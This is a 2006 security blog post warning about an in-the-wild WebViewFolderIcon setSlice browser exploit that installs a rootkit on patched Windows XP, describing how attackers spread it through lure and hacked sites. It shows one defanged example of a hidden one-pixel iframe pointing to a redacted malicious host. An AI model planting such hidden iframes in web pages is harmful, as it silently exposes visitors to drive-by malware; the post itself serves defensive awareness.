Saturday, September 30, 2006

WebViewFolderIcon setSlice exploit in the wild - follow up

Hi folks,

We've now verified that this works pretty well on fully patched XP SP2 (yes, including the VML patch). It installs at least a rootkit, so I'm not going to share the exact URL, but it's along the lines of http://xxxxxxxxxx.biz/dl/slide499.html.

The fact that I only found it on one web site so far is immaterial .... these guys have a well established distribution model, with many adult/ warez sites acting as lures, and it is probably on many more already.

They also like to hack into completely innocent sites, and install an iframe, thus turning them into unwitting lures, and they like to find bulletin boards that are open enough for them to insert their iframe.

I had a question off-blog about what a malicious iframe looks like .... it typically looks something like this...

< i f r a m e src="http://xxxxxxxxx.com/get_st.php?xxxxxxx" width=1 height=1>< / i f r a m e>

The important thing to notice is that width and height are both set to some very small number. What this means is that whatever is inserted by the iframe is too small to be visible, but the code associated with it works just fine.

The exploit is very easy to copy, so I expect this will be widely adopted.

Naturally, SocketShield protects against it.

Roger

0 Comments:

Post a Comment

<< Home